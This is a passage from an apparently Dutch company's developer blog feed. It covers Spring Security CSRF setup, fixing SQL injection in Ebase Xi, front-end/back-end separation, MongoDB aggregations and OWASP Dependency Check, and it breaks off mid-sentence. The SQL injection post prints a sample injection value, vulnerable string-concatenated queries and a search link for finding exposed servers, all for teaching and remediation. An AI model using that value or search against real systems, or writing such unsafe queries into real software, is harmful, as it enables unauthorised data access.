studentService.create("James Doe");
List studs = studentRepository.findAll();
assertTrue(studs.size() == 1);
assertEquals("James Doe", studs.get(0).getName());
assertNotNull(studs.get(0).getEnrollmentDate());
}
}</pre>
<br />
<h2>
Conclusion</h2>
<br />
I like both Embedded MongoDB and Fongo. I prefer Fongo to support unit tests. It's easy to setup, fast to startup. But for running integration tests I would suggest using flapdoodle.embed.mongo as you're actually running on a real MongoDB instance giving you the closest to real-life scenario.Thijs Vonkhttp://www.blogger.com/profile/12161242264508748111noreply@blogger.com9tag:blogger.com,1999:blog-8962763253387334081.post-63468876222736048902015-02-05T23:00:00.000+01:002016-01-20T09:57:12.601+01:00CSRF / XSRF protection using Spring SecurityThe last few years there is an almost constant stream of news articles about some company leaking customer information one way or the other.
While not all of these leaks are caused by badly protected websites themselves, a lot are caused by misconfigurations in the web/data servers, programmers still have a hard time integrating some basic protection against attacks.
<br />
<a name='more'></a>I won't pretend to have knowledge of every aspect of a vigorous web attack against a website (I need to point you to <a href="http://blog.42.nl/2013/12/securing-web-applications-using-owasp.html" title="Eric Hooijmeijer">Erik Hooijmeijer</a> for this), I do know that some of the basic protections are easy to implement due to support by the underlying framework.
<br />
The same goes for a Spring MVC webapplication. With the Spring-Security framework it becomes easier to protect your (web)application. One of the threats is CSRF short for Cross Site Request Forgery. CSRF or XSRF uses an already established session with a trusted website to create a 'forged' request and execute an unwanted command to that website. This can be mitigated by requiring a unique token to be send with the request which has been generated and stored in the httpsession.
<br />
Spring has the capability to auto generate and validate the token and fields in the MVC forms.
Enabling this feature is as simple as adding a library in your project, and adding a bit of configuration in your pom.xml:
<br />
<pre><code class="java">
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-web</artifactId>
<version>3.2.5.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-config</artifactId>
<version>3.2.5.RELEASE</version>
</dependency></code></pre>
Then add the following files to your projects pom file:
<br />
<SecurityWebApplicationInitializer.java><br />
<pre> <code class="java">
/**
* This WebApplicationInitializer register its security filters on the Application
*
* @Order(2)
public class SecurityWebApplicationInitializer extends AbstractSecurityWebApplicationInitializer {}
</code>
</pre>
<pre> <code class="java">
/**
* This WebApplicationInitializer register its security filters on the Application
*
* @Order(2)
*/
public class SecurityWebApplicationInitializer extends AbstractSecurityWebApplicationInitializer {}
</code>
</pre>
<SecurityConfig.java><br />
<pre> <code class="java">
@Configuration
@EnableWebMvcSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
/**
* Because authentication is handled outside the application we don't have to authorize any requests
*/
@Override
@SuppressWarnings("PMD.SignatureDeclareThrowsException")
protected void configure(HttpSecurity http) throws Exception {
http.authorizeRequests().antMatchers("/**").permitAll();
}
}
</code>
</pre>
Notice that in the above file we don't enable csrf protection explicitly as Spring enabled this by default.<br />
You can only explicitly disable it by writing:
<br />
<pre> <code>
protected void configure(HttpSecurity http) throws Exception {
http.authorizeRequests().antMatchers("/**").permitAll().and().csrf().disable();
}
</code>
</pre>
Now in your JSP replace the default <form> tag with the spring-form JSP tag library version and you get auto _csrf hidden input field injected into your forms.
<br />
<form>
There are 2 gotchas!
<br />
<ol>
<li>When also configuring a CharacterEncodingFilter, to make sure you have UTF-8 support all the way through your webstack, you need to make sure that this filter is loaded before the filters that the SecurityWebApplicationInitializer adds to the mix. Because the CSRF filter reads the request parameters the character encoding is already set on the request causing the CharacterEncodingFilter to be pointless. So annotate your base WebApplicationInitializer with a @Order(1) and the SecurityWebApplicationInitializer with @Order(2). This way the CharacterEncodingFilter is loaded before the other filters.
<br />
There is a second way. You can also override beforeSpringSecurityFilterChain and add the CharacterEncodingFilter in that method.
</li>
<li>The Security configuration stores the generated token in the HttpSession on the server (to verify against the returning token). So make sure that your loadbalancers are configured with a sticky-session configuration, otherwise the post to the server can be forwarded to the wrong webserver. As the user has no valid session on that server the validation of the CSRF token will fail.
</li>
</ol>
Read more on <a href="http://docs.spring.io/spring-security/site/docs/3.2.x/guides/" target="_blank" title="Spring Security">Spring Security</a><br />
And other possible attacks on your website: <a href="https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013" target="_blank" title="OWASP">OWASP</a>
</form>
Thijs Vonkhttp://www.blogger.com/profile/12161242264508748111noreply@blogger.com45tag:blogger.com,1999:blog-8962763253387334081.post-38015101243540668702014-12-05T16:16:00.000+01:002015-12-14T15:55:41.787+01:00Ebase Xi Queries : Unsafe by Default<p><b>Ebase Xi (from <a href="http://www.ebasetech.com">ebasetech.com</a>) 4.5.2 is a rapid application development platform I recently encountered at a client. The previous developers had left and a security audit revealed that the (many) forms they built with Ebase Xi were susceptible to SQL Injection.</b> In this blog post I will tell how I fixed the SQL Injections and discovered some interesting things along the way.</p><a name='more'></a><br/><br/><h1>SQL Injection</h1><br/><br/><p>Nowadays its common wisdom that SQL Injection is easily prevented by using prepared statements. These force you to use explicit parameters and by doing so make it impossible for the sql parser to misunderstand the sql and parameter boundaries.</p><br/><br/><p>Before prepared statements it was common to build sql statements by appending strings and values to each other. If one of the values contained a quote, part of the value could escape and become part of the query.</p><br/><br/><pre class="lang:java decode:true"><br/>String name="Erik"<br/>String unsafeQuery = "select * from users where username='"+name+"';"<br/><br/>select * from users where username='Erik';<br/></pre> <br/><br/><p>What would happen if the string "Erik" would become "Erik' or '1'='1" ? The query would do something different altogether.</p><br/><br/><pre>select * from users where username='Erik' or '1'='1';</pre><br/><br/><p>Instead of returning a single named user it would return all users!</p><br/><br/><h1>One checkbox to solve all problems..</h1><br/><br/><p>Ebase Xi supports both prepared statements and string concatenation. Unfortunately the default one is string concatenation. Switching between the two modes is easy, its just a single checkbox that needs to be set.</p><br/><br/><p>Easy, just check the checkbox and you're done! Right?</p><br/><br/><p>Unfortunately there is another complication. The Ebase Xi forces you to predefine all column and parameters you will use in your query. This is not very flexible and so ingenious minds thought up a hack that bypasses these restrictions. It requires you to define a special non persistent parameter of type Integer, typically named &&QUERY. Its non persistent because its used as input only, but more importantly because its type Integer Ebase won't put quotes around this value. Also you can put in any string you like (no type safety here!) . And it only works because of string concatenation.</p><br/><br/><p>You can now build your query string in the FPL Scripts and concatenate strings and values as you like. Since they're built outside the scope of the database resource, no amount of prepared statements checkboxes will make these queries safe.</p><br/><br/><p>Ironically, Ebase Xi supports a safe way of doing these kind of dynamic queries by means of the Dynamic Query checkbox. This will cause the runtime to evaluate the query string twice to find any named parameters. For this to work, all parameters must be named and known in the database resource. So while its possible to make these dynamic queries safe, it does require the rewriting of the sql statement using parameters.</p><br/><pre><br/>set QUERY="select * from users where name='"+NAME+"'";<br/>fetch USER;<br/></pre><br/><p>would become</p><br/><pre><br/>set QUERY="select * from users where name=&&Q_NAME";<br/>set Q_NAME = NAME;<br/>fetch USER;<br/></pre><br/><p>As you can see rewriting these queries is not difficult, however if you have a great variation of parameters it can become quite a challenge to get it right. Also I've chosen to create separate (non persistent) query parameters as the original parameters may be already in use for something else. Typically making these queries safe involves the following steps:<p><br/><br/><ul><li>check the use Prepared Statements checkbox.</li><br/><li>check the dynamic Query checkbox on the query parameter.</li><br/><li>scan through all the scripts to identify the queries and which parameters are used.</li><br/><li>add non persistent query fields for each of the parameters.</li><br/><li>add form fields for each of the parameters and map them.</li><br/><li>rewrite the queries and assign values to the parameters.</li><br/></ul><br/><br/><h1>Check, check, double check.</h1><br/><br/><p>Checking if you've successfully fixed a query is easy if you enable the debug checkbox on the database resource and follow the logging of your web-application server. (Yes the designer also allows viewing the log, but this is easier) If the query strings contains question marks and the log lists the parameters separately you're good to go!</p><br/><pre><br/>DEBUG Debug for database resource SYSTEEM_EMAIL_FORM - SQL statement:<br/>DEBUG select EMAIL_ADRES from ABC_FORM where id in (select ABC_FORM_ID <br/> from ABC_REQUESTS where id in ( (select ABC_ID from ABC_CASES <br/> where cast(id as varchar2(10)) = ?)))<br/>DEBUG parameter1 : value 13470<br/>DEBUG End execution of command - fetch : 11:58:37.703<br/></pre><br/><h1>Oops: Dynamic Lists</h1><br/><br/><p>With all queries fixed and checkboxes in place I thought I was done. Then my eye fell on another query. No question marks and a quoted value. F***P. Did I forget something? A quick investigation revealed that it was not a database resource but a query made by a dynamic list!</p><br/><br/><p>In Ebase Xi Dynamic Lists are used to fill comboboxes and the like based on a query that supports parameters. Unfortunately: No prepared statement checkbox here (sad) That means that if you use Dynamic Lists with user supplied query parameters you're still susceptible to SQL Injection.</p><br/><br/><p>It turns out that there is a non intuitive workaround for this. The Dynamic Lists support the Dynamic Query checkbox as well. If you use a dynamic query (one with a externally supplied sql statement) Ebase will use a prepared statement.</p><br/><br/><h1>Conclusion</h1><br/><br/><p>It is possible to write sql injection safe queries using Ebase Xi. In fact, its even <a href="http://www.ebasetech.com/ufs/doc/Database_Resources.htm#_Toc309125522">explained</a> in the manual. Sadly the defaults are unsafe and in my experience the form developers are simply unaware of this which results in unsafe systems. Fixing the queries is not difficult but just a lot of work.</p><br/><br/><p>Since internet facing Ebase Xi servers in their default configuration are <a href="https://www.google.nl/search?q=inurl%3Aufsmain+inurl%3Aformid">easily identified using Google</a>, I just hope the developers of those systems know what they are doing (and that the default configuration of Ebase Xi is safe - probably not judging from the above..)</p>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com1tag:blogger.com,1999:blog-8962763253387334081.post-44745602996989269352014-10-16T22:25:00.000+02:002016-07-27T10:42:18.822+02:00The case for separating front- and back-end<strong>At 42 we have an ongoing discussion about the separation of the front- and back-end of an application. The back-end being a RESTful service, and the front-end being a modern MVC JavaScript application written in <a href="http://angularjs.org/" target="_blank" title="AngularJS">AngularJS</a>.</strong><br />
<br />
<strong>There are two camps within our ranks: the first camp believes the front- and back-end should be completely separated, where both applications have separate version control, build processes, and deployments.</strong><br />
<br />
<strong>The second camp believes that the back-end should provide the REST API, serve the JavaScript application, and that there should be one deployment and build process that delivers the whole application (front- and back-end) in one package.</strong><br />
<br />
Disclaimer: I'm in the camp that believes strongly in separating the two. So I want to argue the case for separating front- and back-end completely in the post.
<br />
<a name='more'></a><h2>
History</h2>
In ye old days there was only one way to create a website: Using a text-editor you started writing HTML, and when you were done, you uploaded it to a web server. The HTML was static and every time something needed to change you edited the HTML file, and uploaded it again. Easy peasy.<br />
<br />
Smart programmers thought: "if we can generated the HTML dynamically, we can do way more cool stuff with the web." Thus was the back-end created and programmers rejoiced. You picked a language and a database and off you’d go. We didn't create websites anymore but web applications.<br />
<br />
A funny thing happened to HTML and CSS along the way. They seemed to become less important to web development, almost a necessary evil to make things work. Take job descriptions from this period: Big bold letters: "Looking for Java developer" somewhere at the bottom in a list in a way smaller font: "Knowledge of HTML and CSS are a plus".<br />
<br />
We saw HTML and CSS as a thing to be generated but not the actual application. The actual application was written in Java, PHP or C# the HTML was just a build artifact waiting to be served. Heck, some platforms such as "ASP.NET Web Forms" went out of their way to hide any sort of HTML from the developer.<br />
<br />
Then the Ajax revolution happened. Before that we thought of JavaScript as a horrible monstrous little language for displaying animated snowflakes around Christmas. Suddenly we could do so much more, we could provide an interactivity and responsiveness never seen before.<br />
<br />
I remember seeing 'Ajax' for the first time on Gmail, it was loading new emails whilst the page was kept open. I didn't believe my eyes, I was sure I was seeing things. I checked my computer to see if I had installed some Google application that refreshed my browser somehow, or that I installed some plugin.<br />
<br />
Nope, JavaScript was doing an XMLHttpRequest within the browser. It didn't take long before I started using Ajax to impress my coworkers. Then jQuery came along with excellent support for Ajax, and Ajax became commonplace.<br />
<br />
JavaScript became another 'plus' in job descriptions. Books describing its good parts came out, and it was really growing up. People started to see its power and what it meant for our end users.<br />
<br />
Then the iPhone happened and later Android. Suddenly we found ourselves in need of writing APIs to provide these apps with the same data and CRUD functionality our traditional web apps needed. Since our web apps didn't use Ajax for everything, we started writing REST APIs next to our traditional endpoints. Effectively writing some functionality twice.<br />
<br />
Then came a second JavaScript breakthrough: MVC frameworks started popping up, such as Backbone.js and later Angular, Ember, Knockout, etc. JavaScript, it seemed, had learned its lessons from the back-end world.<br />
<br />
But what if the 'MVC' front-end would also only use the RESTFul back-end like the iOS and Android apps already did? Then all 'apps' use the exact same calls, and the web apps would no longer be a 'special' case. REST calls returning JSON all the way down.<br />
<br />
Our MVC JavaScript apps now rivaled native iOS and Android apps in code size and complexity. With the coming of Node.js, which allows you to run JavaScript outside of the browser, there even came build tools and task runners written in JavaScript.<br />
<br />
The front-end part of the equation has finally come onto its own, no longer needing a special 'relationship' with the language the back-end side was programmed in.<br />
<br />
Now that the history is out of the way I'll start making my case.<br />
<h2>
Separation of Concerns</h2>
When I came to work at 42 my first assignment was assisting on a Java project that needed to provide a RESTful interface for an iOS app. The project already had a web based front-end, the idea was that the iOS app would eventually support all features the web app did.<br />
<br />
The web app front-end used JSP with some jQuery to make it more dynamic. Not every functionality used Ajax, but most did, so another goal of the project was to use Ajax for everything and gut JSP from the project. This way the web app and the iOS app became equals using the exact same API.<br />
<br />
We went from a project that had its front- and back-end interwoven, to one where the two only communicated only via Ajax calls. The back-end's job was to provide data, expose ways to manipulate it, and to secure access to the data. Its last job was to serve the HTML for the web app.<br />
<br />
When we were done I looked at the relationship between the front- and back-end. The only concrete relationship the two had was that the back-end served the front-end. If I had ripped out the HTML from the project, had it served by another server under the same domain, the Java back-end and even the end user would be none the wiser, everything would still work as before.<br />
<br />
Looking at the relationship between the iOS app and the web app I realized they were brothers, they were familiar. Both used the back-end in the same way to authenticate a user and send the same HTTP GET and POST request to get things done.<br />
<br />
I realized something: When the back-end and front-end only communicate with each other, but don't need each other, they are separate entities.<br />
<br />
From the perspective of the back-end all I need to do is send valid HTTP requests. I can use the entire application from cURL if I want to. The back-end simply doesn't care as long as I send valid HTTP requests in the correct format. The back-end is completely unaware on what consumes its service.<br />
<br />
The front-end has the same perspective, it calls some service at some URL. As long as the response is valid, and the service does as promised, the front-end doesn't care what the back-end is. If it's written in Java, PHP or Ruby it doesn't matter, heck, even a monkey sitting behind a keyboard would work as long as the communication works via the same protocol.<br />
<br />
The front-end, whether it’s an iOS app or web app, is a separate entity from the back-end. They are separate concerns.<br />
<h2>
Version Control</h2>
In the project described above, the web app and the back-end shared the same version control repository. The iOS app had its own repository.<br />
<br />
I asked myself the question if the recently decoupled HTML and JavaScript should move in its own repository. The answer was yes, they needed to be in separate repositories. I came to this conclusion by looking at the 'git' history of the project. The history, after the decoupling, seemed to be a chimera, two entities living in the same body.<br />
<br />
On one hand there was the history of the back-end: "changed HTTP call", "Optimised login and made it faster". The other commits were front-end: "Moved navigation to top of screen", "Increased the size of the font".<br />
<br />
These commits were often interwoven, worse yet some front-end changes were considered too 'minor', so they got packed together with 'back-end' changes.<br />
<br />
When looking at the history from a back-end perspective, the commits looked littered with stupid minor stuff some 'front-end' hipster frontender made. Ruining the view of the API.<br />
<br />
When looking from the eyes of the front-ender, the exalted commits to enrich the users experience were interspersed with commits from a neckbeard ranting on and on about "REST" and "HTTP" and "optimizing". Whatever that meant. It made looking how the UI changed between versions more difficult.<br />
<br />
What does a background color of a website has to do with an optimization in the login routine? Nothing.<br />
<br />
I also thought about my changes to the front-end and back-end. What if only the changes to the front-end needed to be reversed, that would be very uncomfortable since the history is so interwoven.<br />
<br />
So from a pure front- and back-enders perspective having one repository is very annoying. With the move towards separate jobs for front- and back-enders not every front-ender is going to know how to solve Java merge conflicts and vice versa for JavaScript merge conflicts.<br />
<h2>
Building</h2>
I've mentioned <a href="http://nodejs.org/" title="Node.js">Node.js</a> and it has transformed the way we think about JavaScript. The ability to run JavaScript without a browser from the command line has lead to some pretty exiting options for building JavaScript apps within JavaScript itself.<br />
<br />
<a href="http://gruntjs.com/" title="GruntJS">Grunt</a> is a JavaScript task runner which makes it easy to run specific tasks in series. Everyone can create Grunt tasks, the community has created tasks for: minifying HTML, JavaScript, CSS and images, it has tasks for compiling LESS down to CSS and many more.<br />
<br />
<a href="http://bower.io/" title="Bower">Bower</a> is a dependency manager for the web, which can be used to download third party JavaScript by version. Much like Maven does in the Java world. Bower can even be integrated with Grunt so it can write the correct HTML tags to include the external files for you.<br />
<br />
Using JavaScript to build JavaScript applications means that for the first time JavaScript developers are in control of their own destiny. No longer do you have to depend, as a front-end developer, on the language chosen on the back-end side.<br />
<br />
When you are in control of your own tooling it becomes easier to extend them and you can use them everywhere. Gone are the days of switching between a build processes for an AngularJS app when switching from a Ruby back-end to and a Java back-end.<br />
<h2>
Deployment</h2>
The deployment on a server of a pure JavaScript application is simple because JavaScript apps are static by nature. In the old model we dynamically generated the HTML on the server to make the app dynamic. Now we use JavaScript to retrieve data via Ajax and use JavaScript itself to dynamically render the app. The JavaScript and HTML and CSS are static, between versions of the app they don’t change each time you serve them.<br />
<br />
So all you need is a web server that is good at serving static files. Which is easy because serving static resources means you can cache the app more easily.<br />
<br />
Plus knowing that an application is static means you can use content delivery networks to serve the application more easily.<br />
<br />
Via Grunt it is possible to generate a package that has made unique names for each resource, such as images, CSS and HTML, and which is ready for deployment. Updating the app becomes as simple as uploading a folder.<br />
<h2>
Cultural</h2>
Suggesting moving the front-end and back-end into their own repositories, and stopping to serve the front-end from the back-end invokes some negative responses:<br />
<br />
"Why put them in separate repositories, I'm a fullstack engineer I do both front- and back-end work. It will just make my life harder."<br />
<br />
"It's so convenient to have to deploy only one package."<br />
<br />
"Maven can do that too, all you need to do is (some magic that a non Java enabled front-ender cannot possibly understand)."<br />
<br />
I think these reactions stem from the fact we've been used to seeing HTML, CSS and JavaScript as byproducts of the actual Java application. It is difficult to change something we've all been doing for so long.<br />
<br />
I think it is a "culture" thing. Once we start seeing web apps as mature applications with their own build processes, conventions and culture, it becomes more natural to separate them from the back-end.<br />
<br />
Here's a thought experiment: You're a developer making a web application via AngularJS calling a REST service you've created with Spring MVC. Suddenly a wild Pointy-Haired Boss appears with an iOS developer in tow, he's going to make the iOS version of the application.<br />
<br />
Would you include the Objective-C and Swift code in your git repository?<br />
<br />
Would you configure Maven to kick-off a Mac-mini to start the iOS build process, every time you add change something on the server?<br />
<br />
Would you like to be emailed when the iOS programmer makes mistakes when the build has failed?<br />
<br />
Would you mind it if the iOS programmers mistakes send you emails that the build has failed?<br />
<br />
Would you change your release task to submit a version to the App Store?<br />
<br />
Would you hold your release until it has completed the App Store approval process?<br />
<br />
Did you vomit a little bit just thinking about these unholy questions?<br />
<h2>
Conclusion</h2>
Separating the front- and back-end into their own repositories makes it easier to revert changes.<br />
<br />
Building JavaScript apps with JavaScripts empowers the front-end to create great reusable tools, and create conventions regardless of back-end language.<br />
<br />
Deploying static files is what servers are good at, using Grunt it becomes really easy to generate these static files.<br />
<br />
JavaScript apps are on the same level as iOS or Android apps. They don't belong or are part of the 'server'. Let start treating them as first class citizens of the REST API.Anonymousnoreply@blogger.com14tag:blogger.com,1999:blog-8962763253387334081.post-61167628737907548332014-10-07T11:00:00.000+02:002015-12-14T15:55:41.851+01:00Aggregations in MongoDB with Spring Data<h2>Aggregations in MongoDB</h2><br/>The MongoDB aggregation operations allow us to process data records and return computed results. Aggregation operations group values from multiple documents together, we can perform a variety of operations on the grouped data to return a single result. Spring Data Mongo makes the usage of this feature from your Java application very easy.<br/><a name='more'></a><br/><strong>Example</strong><br/>Given the (very uncommon) collection "factories" with the following documents:<br/><br/><code>{ "_id" : 1, "name" : "bicycle_parts", "produces" : ["wheels", "spokes"], "location" : [ 5.1045178, 51.9850405 ], country: "NL"}<br/>{ "_id" : 2, "name" : "car_parts", "produces" : ["wheels", "engines"], "location" : [ 6.6113998, 53.2228623 ], country: "NL" }</code><br/><br/>Now we want to count the number of factories in the Netherlands that produce all different production parts; we will use an aggregation!<br/>We have to:<br/>- Match all documents with {country:"NL"}. (<a title="Mongo Aggregation Operator Match" href="http://docs.mongodb.org/manual/reference/operator/aggregation/match/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/match/</a>)<br/>- Unwind the "produces" array to be able to group by the different production parts. (<a title="Mongo Aggregation Operator Produces" href="http://docs.mongodb.org/manual/reference/operator/aggregation/unwind/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/unwind/</a>)<br/>- Group by the unwound "produces" array elements. (<a title="Mongo Aggregation Operator Group" href="http://docs.mongodb.org/manual/reference/operator/aggregation/group/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/group/</a>)<br/><br/><code>db.factories.aggregate([<br/>{ $match: { "country":"NL" } },<br/>{ $unwind: "produces" },<br/>{ $group: { _id: "$produces", count: { $sum: 1 } } }<br/>]);<br/></code><br/>The aggregation result will look like:<br/><br/><code>{ "_id":"wheels", "count":2 }<br/>{ "_id":"spokes", "count":1 }<br/>{ "_id":"engines", "count":1 }</code><br/><h2>Aggregations With the Mongo Java Driver</h2><br/>We want to call this from our java application, so let's use the Mongo Java driver api:<br/><br/><code>DBCollection factories ...<br/>// create our pipeline operations, first with the $match<br/>DBObject match = new BasicDBObject("$match", new BasicDBObject("country", "NL"));<br/>// The $unwind<br/>DBObject unwind = new BasicDBObject("$unwind", "produces");<br/>// Now the $group operation<br/>DBObject groupFields = new BasicDBObject( "_id", "$produces");<br/>groupFields.put("count", new BasicDBObject( "$sum", 1));<br/>DBObject group = new BasicDBObject("$group", groupFields);<br/>// run aggregation<br/>List pipeline = Arrays.asList(match, unwind, group);<br/>AggregationOutput output = factories.aggregate(pipeline);</code><br/><br/>Nice, now lets change the $match criteria to get all factories within 10 kilometres from a certain point (we use Mongo legacy coordinates here for simplicity):<br/><code>...<br/>DBObject nearPoint = new BasicDBObject("$near", [ 5.1945978, 52.9950905 ]);<br/>nearPoint.put("$maxDistance", 10000);<br/>DBObject match = new BasicDBObject("$match", new BasicDBObject("location", nearPoint));<br/>...</code><br/><br/>We run the new aggregation and... BANG!<br/><br/><code>IllegalArgumentException: "result undefined"</code>... That doesn't tell us much... Now what?<br/>(Actually the exact mongo error message is in the aggregation result, but when the Mongo Java driver tries to construct an AggregationOutput object, it throws the IllegalArgumentException with this general error instead of adding the error message from the db... That's why error information gets lost here.)<br/><h2>Spring Data to the rescue</h2><br/><code>List aggregationOperations = new ArrayList();<br/>aggregationOperations.add(MatchOperation.match(Criteria.where("location").near(new Point(5.1945978, 52.9950905))));<br/>aggregationOperations.add(UnwindOperation.unwind("produces"));<br/>aggregationOperations.add(GroupOperation.group("produces").count().as("count"));<br/>AggregationResults result = mongoTemplate.aggregate(newAggregation(aggregationOperations), "factories", AggregateFactoryResult.class);</code><br/><br/>Now we get a Spring data exception with an understandable message directly from the mongodb:<br/><br/><code>org.springframework.dao.InvalidDataAccessApiUsageException: Command execution failed: Error [exception: $near is not allowed inside of a $match aggregation expression]</code><br/><br/>(Actually Spring Data extracts the mongo error message the right way from the MonoDriver result; does it better that the aggregate function of the driver itself!)<br/>Unfortunately the only solution is to not apply a $near clause in the $match expression, but at least we know WHY our aggregation fails!<br/><h2>Benefits of Spring Data usage</h2><br/>- Typesafe AggregationResults; write your own bean result class (AggregateFactoryResult in the example) and Spring Data does the mapping.<br/>- Prevent typos in mongo operation names like "$match" and "$unwind" because Spring Data provides builders for all mongo operations.<br/>- Understandable exceptions (with the introduction of Mongo Java driver version 3, more understandable exceptions are introduced though).<br/><h2>Resources</h2><br/>- <a title="Mongo Aggregation Manual" href="http://docs.mongodb.org/manual/aggregation/" target="_blank">http://docs.mongodb.org/manual/aggregation/</a><br/>- <a title="Mongo Java Driver Tutorial" href="http://docs.mongodb.org/ecosystem/tutorial/use-aggregation-framework-with-java-driver/" target="_blank">http://docs.mongodb.org/ecosystem/tutorial/use-aggregation-framework-with-java-driver/</a><br/>- <a title="Spring Data Mongo Reference Docs" href="http://docs.spring.io/spring-data/data-mongo/docs/1.6.0.RELEASE/reference/html/#mongo.aggregation" target="_blank">http://docs.spring.io/spring-data/data-mongo/docs/1.6.0.RELEASE/reference/html/#mongo.aggregation</a>Bas de Voshttp://www.blogger.com/profile/15309557220477768661noreply@blogger.com1tag:blogger.com,1999:blog-8962763253387334081.post-68739761573791387582014-06-15T19:25:00.000+02:002015-12-14T15:55:41.886+01:00Checking framework vulnerabilities using Dependency Check<p><b>A web-application is never finished. Even when no new features are being developed new vulnerabilities may be found in the frameworks used in the application requiring a patch or an upgrade. Are you actively monitoring the frameworks that are in use in your applications? My guess is no, or at least not all of them.</b> Well, luckily enough OWASP has a <a href="http://jeremylong.github.io/DependencyCheck/index.html">very nice utility</a> that easily integrates into a build environment and can do most of the hard work for you. Let me tell you about it.</p><a name='more'></a><br/><br/><p>The utility is called Dependency Check and is written and maintained by <a href="https://twitter.com/ctxt">Jeremy Long</a>. It comes in four different flavors: a Maven plugin, an Ant task, a commandline script and a Jenkins (build server) plugin. In this blog post I will focus on the maven plugin.</p><br/><br/><h3>Integrating Dependency Check into the Maven build</h3><br/><br/><p>Making the Dependency Check plugin a part of the Maven build is easy. It involves declaring the plugin as a part of your build and naming the goal to run (there is only one, check).</p><br/><br/><pre class="lang:xml decode:true"><br/><plugin><br/> <groupId>org.owasp</groupId><br/> <artifactId>dependency-check-maven</artifactId><br/> <version>1.2.1</version><br/> <executions><br/> <execution><br/> <goals><br/> <goal>check</goal><br/> </goals><br/> <configuration><br/> </configuration><br/> </execution><br/> </executions> <br/></plugin><br/></pre><br/><br/><p>There are several <a href="http://jeremylong.github.io/DependencyCheck/dependency-check-maven/configuration.html">configuration options</a> but we'll look into that later. First, lets run the build and see what happens:</p><br/><br/><pre class="lang:xml decode:true"><br/>[INFO] --- dependency-check-maven:1.2.1:check (default) @ someproject ---<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.StandardUpdate update<br/>INFO: NVD CVE requires several updates; this could take a couple of minutes.<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2002<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2003<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2004<br/></pre><br/><br/><p>Ok, this could take a while. Dependency Check tests against the '<a href="http://nvd.nist.gov/">National Vulnerability Database</a>' (NVD) which holds known vulnerabilities of software products. Dependency Check will download the whole NVD once and stores it in your local maven repository. Each subsequent run checks for updates. After that comes the analysis:</p><br/><br/><pre class="lang:xml decode:true"><br/>Jun 15, 2014 1:43:16 PM org.owasp.dependencycheck.Engine analyzeDependencies INFO: Analysis Starting<br/>Jun 15, 2014 1:46:52 PM org.owasp.dependencycheck.Engine analyzeDependencies INFO: Analysis Complete<br/>Jun 15, 2014 1:46:54 PM org.owasp.dependencycheck.maven.DependencyCheckMojo showSummary WARNING:<br/></pre><br/> <br/><p>One or more dependencies were identified with known vulnerabilities:</p><br/><br/><pre class="lang:xml decode:true"><br/>commons-fileupload-1.2.2.jar<br/> (commons-fileupload:commons-fileupload:1.2.2, cpe:/a:apache:commons_fileupload:1.2.2) :<br/> CVE-2014-0050, CVE-2013-0248<br/>javax.servlet.jsp.jstl-1.2.1.jar<br/> (cpe:/a:oracle:glassfish, cpe:/a:oracle:glassfish_server:1.2.1) :<br/> CVE-2013-2566, CVE-2011-5035<br/></pre><br/><br/><p>Oh dear. It seems that my project is vulnerable! The console lists only the summary, a report containing full details are present in <code>./target/dependency-check-report.html</code> </p><br/><br/><h3>How does Dependency Check work?</h3><br/><br/><p>Interestingly enough its current version (1.2.1) doesn't (yet) use the version information available inside the Maven pom. Instead it relies on the contents of the META-INF folder present in most jars or alternatively it looks up the name and version in Sonatype Nexus Repository using the hash of the jar file. It then uses that information to form the so called '<a href="http://nvd.nist.gov/cpe.cfm">Common Platform Identifier</a>' (CPI) and uses that to find vulnerabilities in the NVD downloaded before the analysis.</p><br/><br/><p>Vulnerabilities are named using a 'Common Vulnerabilities and Exposures' (CVE) identifier and contain the most important information on a vulnerability. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050">Have a look at one</a>. Note how each entry has a severity score which, on a scale from 1 to 10, indicates how bad the issue is. A score of 7 to 10 indicates a critical flaw. You need to know that this rating means of course, for example the recent <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160">HeartBleed bug in OpenSSL</a> 'only' scored 5.0. Notice the nice red explanation on the why of this 'low' score. Yes, the score only evaluates the direct risk to the system having the vulnerability.</p><br/><br/><p>The NVD database combined with the CPI results in one or more CVE identifiers if your libraries contain known vulnerabilities. By default this doesn't break the build, but you can make it by specifying a highest allowed severity score (using <code>failBuildOnCVSS</code>) in the configuration.</p><br/><br/><h3>Dependency Check results</h3><br/><br/><p>Let's investigate why Dependency Check found some of my jars vulnerable. Lets start with commons-fileupload. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050">CVE-2014-0050</a>, <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0248">CVE-2013-0248</a> tell me that my version of this library allows for a denial of service attack and the overwriting of arbitrary files. Not good! I definitely need to upgrade this library.</p><br/><br/><p>The other library, the Java standard Tag Library has two CVE's that seem rather odd for its function (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2566">CVE-2013-2566</a>, <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5035">CVE-2011-5035</a>). The first complains about encryption and the RC4 algorithm. The second is about Hash Collisions. Both seem to be talking about application servers, not a Tag library. If you look at the console output you can see that the library was wrongly identified as <code>oracle:glassfish_server:1.2.1</code></p><br/><br/><h3>False Positives</h3><br/><br/><p>Because of often incomplete data in the META-INF folder and that not all jar files are in the Sonatype Nexus some jars cannot be identified (such as most of the spring-framework jars) or are wrongly identified (e.g. the jstl jar). This means that sometimes vulnerabilities are missed or 